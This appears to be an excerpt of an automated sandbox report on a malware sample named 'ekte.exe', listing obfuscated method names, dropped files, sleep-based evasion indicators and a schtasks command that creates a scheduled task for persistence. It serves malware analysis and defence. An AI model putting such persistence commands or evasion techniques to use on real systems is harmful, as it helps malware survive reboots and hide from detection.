Source: 0.2.ekte.exe.67b0000.6.raw.unpack, UkVUKC2jEai4CGi2Se.cs High entropy of concatenated method names: 'eiyu3FjGhI', 'tTFuDHsqEl', 'PM3uW39cda', 'mcDuUOAHOi', 'YVDu2cnkbC', 'SrMuvNDiWP', 'DakugXqRdq', 'A6guEmURuU', 'q6Bu8SQ6ph', 'CRGuGP14A3'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, PJcM4TPF3FkembsOYq.cs High entropy of concatenated method names: 'gdULKPg2yr', 'RAWLmhBmHY', 'W05LTGm6m3', 'b45L72HaSh', 'tXyLsS0OYd', 'IwXLlfXJGs', 'h1QL6qrs1t', 'n1SLqQ50uh', 'QatLtDGTpi', 'Lx8L9EEWDP'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, wyR6uyonrymvyqkOh2.cs High entropy of concatenated method names: 'mCpxFpAdOS', 'bvGxnMkGZU', 'HJuxwLpukg', 'YCZx3bmXn6', 'l9LxDervei', 'DoaxUXiiTd', 'XPNx2WjFmT', 'Nv3uh3hvsm', 'TRnurlndua', 'XkGuJ6uing'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, WBNVGjz7eRqJ47EZn1.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HDLxL7YSy1', 'FNVxY5VlNG', 'yLhxduEAZs', 'n99xMOk3Ya', 'eIRxuOAGyc', 'qiLxxY0PH0', 'iGvxiIAP5w'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, K1rZtSUuKDiT2gXLO3.cs High entropy of concatenated method names: 'ssYvB5XHg5', 'VNtvIjqiwA', 'PrMvcZrpGG', 'vDFvAHkrJg', 'ur5veQa5t8', 'x9FvQfTBC4', 'sCMvOQN9hY', 'EjAvKPL0ys', 'QdFvm4PqgM', 'yVqvoV1Jec'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, m6ldtHNLsJmcXYbkiX.cs High entropy of concatenated method names: 'Dispose', 'fQVFJ8dGkf', 'UHES7ejg23', 'mXiZZ6pJiP', 'S9kFkwsVcb', 'VWLFzxmqvY', 'ProcessDialogKey', 'IGRSCenDpA', 'reASF7aKaW', 'mDGSSICd16'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, rrydSlZNZ76wCXitSf.cs High entropy of concatenated method names: 'sv4WAc4dmQ', 'E0QWQZpVMP', 'UVRWK6KQ3g', 'Dl4Wm7WEJl', 'rN5WYWVT0y', 'XTvWdIVjuV', 'D8VWMSxxXn', 'g6tWujZ1lC', 'l7ZWxCkRM9', 'GfxWi7nOpb'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, DSJdqD9Y86mwaZScjh.cs High entropy of concatenated method names: 'ToString', 'qOid9RD95D', 'qK9d7ZG9N5', 'hP8d44DQ3j', 'g5rdskVpQ2', 'nqIdlpwXSm', 'y8xdV3c4RE', 'NiSd6bW6Zg', 'WnAdqjmJqd', 'Q2RdReb9Y9'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, GU2SbFu6vnjS2UV3A6.cs High entropy of concatenated method names: 's2BDPyb9Et', 'lTTDjXKrC6', 'xguD17ZWKw', 'DaXDbQIVvy', 'TSgDHHe08s', 'Sv9D04vVT5', 'JF4DhcvkbM', 'b2LDrTTerH', 'hcIDJi9fMo', 'rIiDkYcp5E'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, iE2YC2sTBAG7vR9RqE.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ApSSJU7Tgm', 'zlgSkxDVqP', 'UxqSzPJtjK', 'CFHnCiSiGy', 'W77nFjSnoR', 'fEonSVVPNI', 'EbDnnZGtYZ', 'zmJiutxqq2f8vwyejYr'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, zpJ0IIOQqJJKMuU1Tp.cs High entropy of concatenated method names: 'WAWv3wGXOX', 'FyDvWfVGtj', 'THZv2un6jB', 'lR12khhNlA', 'yaD2zMMUiW', 'Lf7vCprcr1', 'JF6vF9qB5A', 'yGXvSqn1sA', 'JkSvnVLTXM', 'RXQvwrKTGy'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, IllM6A3aZOPcMgXjOU.cs High entropy of concatenated method names: 'jSlcLa87B', 'TdRALONGV', 'mtkQEMfTh', 'wb4OAHLWm', 'JOhmYuIcS', 'Kmvooa3Hi', 'cv8sHmy1Hg981deDfH', 'H9VwdmNVZClunmE9Dp', 'PyiuDJoJm', 'l08iHvQbZ'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, bjGcTBS7eYkmH0ESo8.cs High entropy of concatenated method names: 'Fkv2f8U1y4', 'deM2DMDSC4', 'dpo2U7FElf', 'bjC2vgtX5S', 'zkb2gx7YIK', 'GaFUHmMC8E', 'N2JU0mfvbB', 'dsDUhgjaBP', 'RyhUrjM7aN', 'gjtUJ0qJcc'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, LbhCp6bqvsHPITEbbd.cs High entropy of concatenated method names: 'AEqFvf8avx', 'JquFgalxFC', 'ShMF8EfTJW', 'NvtFGlxbwF', 'jfiFY4XaQ9', 'KasFdDiygr', 'XpGKYKDa2JhpumvAZO', 'YNKSAU0XIZcxjtUWL4', 'SYAFFQlDJt', 'XciFndJota'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, EBF8HKpg2H8gNx5JlU.cs High entropy of concatenated method names: 'kuduTnCpaA', 'oNHu7ZsRvs', 'yLZu4FmcaM', 'P5FusCNICY', 'EHquPfQjNY', 'VYeulZSwms', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.cs High entropy of concatenated method names: 'WAOnfkTXWQ', 'HaXn3X1XqF', 'cMOnDFb6EL', 'uQBnWoYK46', 'EInnUYO2x7', 'jTsn2oivgy', 'rRNnv1R3at', 'gtlngdH8mZ', 'DsinETOmhj', 'UXon8YPoAP'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, FBLsfKKwpF9k583lKwM.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jvCiP0JVX6', 'dlmijAtZB8', 'y5Yi1S6rxK', 'IAcibWobmZ', 'eSgiHnQLyT', 'Pi6i0Y7FqI', 'NtNihFSYDR'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, vt8cqPvll0puwSpjTi.cs High entropy of concatenated method names: 'OQlUeuGnZJ', 'qbGUOOhq1P', 'zgcW4cVR2C', 'LJ6Wst1q3n', 'zikWloXLFg', 'GY8WVvybMG', 'Q4UW6NpPEf', 'QduWqUPCaG', 'HoFWRFZKEN', 'oVbWtuiO7m'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, bWcZ41KMwu9OHEiK6Qt.cs High entropy of concatenated method names: 'I5pxB2Jpee', 'c1QxI5hfLV', 'BAQxc8Pf1f', 'wZhxAHammN', 'MAKxeOCLCx', 'YYrxQxKrtQ', 'GYlxOysBpq', 'by4xKHIjJ0', 'FA0xmuoH4H', 'Yabxo5D8Hs'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, nNTYENVbpVNaaaQZwt.cs High entropy of concatenated method names: 'jTaMrxhNBP', 'TxvMkHUmkq', 'sP3uCfHUt9', 'RGuuFmgYVm', 'wqEM9mNoPB', 'EYPMys8pip', 'UaCMa6iQhV', 'WnxMPDdRSI', 'YJ6MjAAv2U', 'bDnM101eL9'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, UkVUKC2jEai4CGi2Se.cs High entropy of concatenated method names: 'eiyu3FjGhI', 'tTFuDHsqEl', 'PM3uW39cda', 'mcDuUOAHOi', 'YVDu2cnkbC', 'SrMuvNDiWP', 'DakugXqRdq', 'A6guEmURuU', 'q6Bu8SQ6ph', 'CRGuGP14A3'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, PJcM4TPF3FkembsOYq.cs High entropy of concatenated method names: 'gdULKPg2yr', 'RAWLmhBmHY', 'W05LTGm6m3', 'b45L72HaSh', 'tXyLsS0OYd', 'IwXLlfXJGs', 'h1QL6qrs1t', 'n1SLqQ50uh', 'QatLtDGTpi', 'Lx8L9EEWDP'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, wyR6uyonrymvyqkOh2.cs High entropy of concatenated method names: 'mCpxFpAdOS', 'bvGxnMkGZU', 'HJuxwLpukg', 'YCZx3bmXn6', 'l9LxDervei', 'DoaxUXiiTd', 'XPNx2WjFmT', 'Nv3uh3hvsm', 'TRnurlndua', 'XkGuJ6uing'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, WBNVGjz7eRqJ47EZn1.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HDLxL7YSy1', 'FNVxY5VlNG', 'yLhxduEAZs', 'n99xMOk3Ya', 'eIRxuOAGyc', 'qiLxxY0PH0', 'iGvxiIAP5w'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, K1rZtSUuKDiT2gXLO3.cs High entropy of concatenated method names: 'ssYvB5XHg5', 'VNtvIjqiwA', 'PrMvcZrpGG', 'vDFvAHkrJg', 'ur5veQa5t8', 'x9FvQfTBC4', 'sCMvOQN9hY', 'EjAvKPL0ys', 'QdFvm4PqgM', 'yVqvoV1Jec'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, m6ldtHNLsJmcXYbkiX.cs High entropy of concatenated method names: 'Dispose', 'fQVFJ8dGkf', 'UHES7ejg23', 'mXiZZ6pJiP', 'S9kFkwsVcb', 'VWLFzxmqvY', 'ProcessDialogKey', 'IGRSCenDpA', 'reASF7aKaW', 'mDGSSICd16'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, rrydSlZNZ76wCXitSf.cs High entropy of concatenated method names: 'sv4WAc4dmQ', 'E0QWQZpVMP', 'UVRWK6KQ3g', 'Dl4Wm7WEJl', 'rN5WYWVT0y', 'XTvWdIVjuV', 'D8VWMSxxXn', 'g6tWujZ1lC', 'l7ZWxCkRM9', 'GfxWi7nOpb'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, DSJdqD9Y86mwaZScjh.cs High entropy of concatenated method names: 'ToString', 'qOid9RD95D', 'qK9d7ZG9N5', 'hP8d44DQ3j', 'g5rdskVpQ2', 'nqIdlpwXSm', 'y8xdV3c4RE', 'NiSd6bW6Zg', 'WnAdqjmJqd', 'Q2RdReb9Y9'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, GU2SbFu6vnjS2UV3A6.cs High entropy of concatenated method names: 's2BDPyb9Et', 'lTTDjXKrC6', 'xguD17ZWKw', 'DaXDbQIVvy', 'TSgDHHe08s', 'Sv9D04vVT5', 'JF4DhcvkbM', 'b2LDrTTerH', 'hcIDJi9fMo', 'rIiDkYcp5E'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, iE2YC2sTBAG7vR9RqE.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ApSSJU7Tgm', 'zlgSkxDVqP', 'UxqSzPJtjK', 'CFHnCiSiGy', 'W77nFjSnoR', 'fEonSVVPNI', 'EbDnnZGtYZ', 'zmJiutxqq2f8vwyejYr'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, zpJ0IIOQqJJKMuU1Tp.cs High entropy of concatenated method names: 'WAWv3wGXOX', 'FyDvWfVGtj', 'THZv2un6jB', 'lR12khhNlA', 'yaD2zMMUiW', 'Lf7vCprcr1', 'JF6vF9qB5A', 'yGXvSqn1sA', 'JkSvnVLTXM', 'RXQvwrKTGy'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, IllM6A3aZOPcMgXjOU.cs High entropy of concatenated method names: 'jSlcLa87B', 'TdRALONGV', 'mtkQEMfTh', 'wb4OAHLWm', 'JOhmYuIcS', 'Kmvooa3Hi', 'cv8sHmy1Hg981deDfH', 'H9VwdmNVZClunmE9Dp', 'PyiuDJoJm', 'l08iHvQbZ'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, bjGcTBS7eYkmH0ESo8.cs High entropy of concatenated method names: 'Fkv2f8U1y4', 'deM2DMDSC4', 'dpo2U7FElf', 'bjC2vgtX5S', 'zkb2gx7YIK', 'GaFUHmMC8E', 'N2JU0mfvbB', 'dsDUhgjaBP', 'RyhUrjM7aN', 'gjtUJ0qJcc'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, LbhCp6bqvsHPITEbbd.cs High entropy of concatenated method names: 'AEqFvf8avx', 'JquFgalxFC', 'ShMF8EfTJW', 'NvtFGlxbwF', 'jfiFY4XaQ9', 'KasFdDiygr', 'XpGKYKDa2JhpumvAZO', 'YNKSAU0XIZcxjtUWL4', 'SYAFFQlDJt', 'XciFndJota'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, EBF8HKpg2H8gNx5JlU.cs High entropy of concatenated method names: 'kuduTnCpaA', 'oNHu7ZsRvs', 'yLZu4FmcaM', 'P5FusCNICY', 'EHquPfQjNY', 'VYeulZSwms', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.cs High entropy of concatenated method names: 'WAOnfkTXWQ', 'HaXn3X1XqF', 'cMOnDFb6EL', 'uQBnWoYK46', 'EInnUYO2x7', 'jTsn2oivgy', 'rRNnv1R3at', 'gtlngdH8mZ', 'DsinETOmhj', 'UXon8YPoAP'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, FBLsfKKwpF9k583lKwM.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jvCiP0JVX6', 'dlmijAtZB8', 'y5Yi1S6rxK', 'IAcibWobmZ', 'eSgiHnQLyT', 'Pi6i0Y7FqI', 'NtNihFSYDR'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, vt8cqPvll0puwSpjTi.cs High entropy of concatenated method names: 'OQlUeuGnZJ', 'qbGUOOhq1P', 'zgcW4cVR2C', 'LJ6Wst1q3n', 'zikWloXLFg', 'GY8WVvybMG', 'Q4UW6NpPEf', 'QduWqUPCaG', 'HoFWRFZKEN', 'oVbWtuiO7m'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, bWcZ41KMwu9OHEiK6Qt.cs High entropy of concatenated method names: 'I5pxB2Jpee', 'c1QxI5hfLV', 'BAQxc8Pf1f', 'wZhxAHammN', 'MAKxeOCLCx', 'YYrxQxKrtQ', 'GYlxOysBpq', 'by4xKHIjJ0', 'FA0xmuoH4H', 'Yabxo5D8Hs'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, nNTYENVbpVNaaaQZwt.cs High entropy of concatenated method names: 'jTaMrxhNBP', 'TxvMkHUmkq', 'sP3uCfHUt9', 'RGuuFmgYVm', 'wqEM9mNoPB', 'EYPMys8pip', 'UaCMa6iQhV', 'WnxMPDdRSI', 'YJ6MjAAv2U', 'bDnM101eL9'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, UkVUKC2jEai4CGi2Se.cs High entropy of concatenated method names: 'eiyu3FjGhI', 'tTFuDHsqEl', 'PM3uW39cda', 'mcDuUOAHOi', 'YVDu2cnkbC', 'SrMuvNDiWP', 'DakugXqRdq', 'A6guEmURuU', 'q6Bu8SQ6ph', 'CRGuGP14A3'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, PJcM4TPF3FkembsOYq.cs High entropy of concatenated method names: 'gdULKPg2yr', 'RAWLmhBmHY', 'W05LTGm6m3', 'b45L72HaSh', 'tXyLsS0OYd', 'IwXLlfXJGs', 'h1QL6qrs1t', 'n1SLqQ50uh', 'QatLtDGTpi', 'Lx8L9EEWDP'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, wyR6uyonrymvyqkOh2.cs High entropy of concatenated method names: 'mCpxFpAdOS', 'bvGxnMkGZU', 'HJuxwLpukg', 'YCZx3bmXn6', 'l9LxDervei', 'DoaxUXiiTd', 'XPNx2WjFmT', 'Nv3uh3hvsm', 'TRnurlndua', 'XkGuJ6uing'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, WBNVGjz7eRqJ47EZn1.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HDLxL7YSy1', 'FNVxY5VlNG', 'yLhxduEAZs', 'n99xMOk3Ya', 'eIRxuOAGyc', 'qiLxxY0PH0', 'iGvxiIAP5w'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, K1rZtSUuKDiT2gXLO3.cs High entropy of concatenated method names: 'ssYvB5XHg5', 'VNtvIjqiwA', 'PrMvcZrpGG', 'vDFvAHkrJg', 'ur5veQa5t8', 'x9FvQfTBC4', 'sCMvOQN9hY', 'EjAvKPL0ys', 'QdFvm4PqgM', 'yVqvoV1Jec'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, m6ldtHNLsJmcXYbkiX.cs High entropy of concatenated method names: 'Dispose', 'fQVFJ8dGkf', 'UHES7ejg23', 'mXiZZ6pJiP', 'S9kFkwsVcb', 'VWLFzxmqvY', 'ProcessDialogKey', 'IGRSCenDpA', 'reASF7aKaW', 'mDGSSICd16'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, rrydSlZNZ76wCXitSf.cs High entropy of concatenated method names: 'sv4WAc4dmQ', 'E0QWQZpVMP', 'UVRWK6KQ3g', 'Dl4Wm7WEJl', 'rN5WYWVT0y', 'XTvWdIVjuV', 'D8VWMSxxXn', 'g6tWujZ1lC', 'l7ZWxCkRM9', 'GfxWi7nOpb'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, DSJdqD9Y86mwaZScjh.cs High entropy of concatenated method names: 'ToString', 'qOid9RD95D', 'qK9d7ZG9N5', 'hP8d44DQ3j', 'g5rdskVpQ2', 'nqIdlpwXSm', 'y8xdV3c4RE', 'NiSd6bW6Zg', 'WnAdqjmJqd', 'Q2RdReb9Y9'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, GU2SbFu6vnjS2UV3A6.cs High entropy of concatenated method names: 's2BDPyb9Et', 'lTTDjXKrC6', 'xguD17ZWKw', 'DaXDbQIVvy', 'TSgDHHe08s', 'Sv9D04vVT5', 'JF4DhcvkbM', 'b2LDrTTerH', 'hcIDJi9fMo', 'rIiDkYcp5E'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, iE2YC2sTBAG7vR9RqE.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ApSSJU7Tgm', 'zlgSkxDVqP', 'UxqSzPJtjK', 'CFHnCiSiGy', 'W77nFjSnoR', 'fEonSVVPNI', 'EbDnnZGtYZ', 'zmJiutxqq2f8vwyejYr'
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, zpJ0IIOQqJJKMuU1Tp.cs High entropy of concatenated method names: 'WAWv3wGXOX', 'FyDvWfVGtj', 'THZv2un6jB', 'lR12khhNlA', 'yaD2zMMUiW', 'Lf7vCprcr1', 'JF6vF9qB5A', 'yGXvSqn1sA', 'JkSvnVLTXM', 'RXQvwrKTGy'
Source: C:\Windows\SysWOW64\findstr.exe File created: C:\Users\user\AppData\Local\Temp\sqlite3.dll
Source: C:\Users\user\Desktop\ekte.exe File created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe

Boot Survival

Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"
Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (26 occurrences)
Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX (21 occurrences)
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: 1B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: 2890000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: A40000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: 8980000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: 9980000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: 9B80000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: AB80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 240000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 2330000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 6D30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 7D30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 7ED0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 8ED0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A00101 rdtsc 8_2_00A00101
Source: C:\Users\user\Desktop\ekte.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ekte.exe Thread delayed: delay time: 240000
Source: C:\Users\user\Desktop\ekte.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (4 occurrences)
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Thread delayed: delay time: 240000
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (3 occurrences)
Source: C:\Users\user\Desktop\ekte.exe Window / User API: threadDelayed 3610
Source: C:\Users\user\Desktop\ekte.exe Window / User API: threadDelayed 1842
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1124
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2092
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1635
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1269
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Window / User API: threadDelayed 2429
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Window / User API: threadDelayed 2434
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1752
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1740
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2029
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1034
Source: C:\Windows\SysWOW64\findstr.exe Window / User API: threadDelayed 9747
Source: C:\Windows\SysWOW64\findstr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dll
Source: C:\Windows\SysWOW64\findstr.exe API coverage: 1.8 %
Source: C:\Users\user\Desktop\ekte.exe TID: 3480 Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Users\user\Desktop\ekte.exe TID: 3480 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\ekte.exe TID: 3480 Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\Desktop\ekte.exe TID: 3724 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\ekte.exe TID: 3420 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568 Thread sleep count: 1124 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568 Thread sleep count: 2092 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3744 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3772 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3548 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3776 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\taskeng.exe TID: 3860 Thread sleep time: -60000s >= -30000s
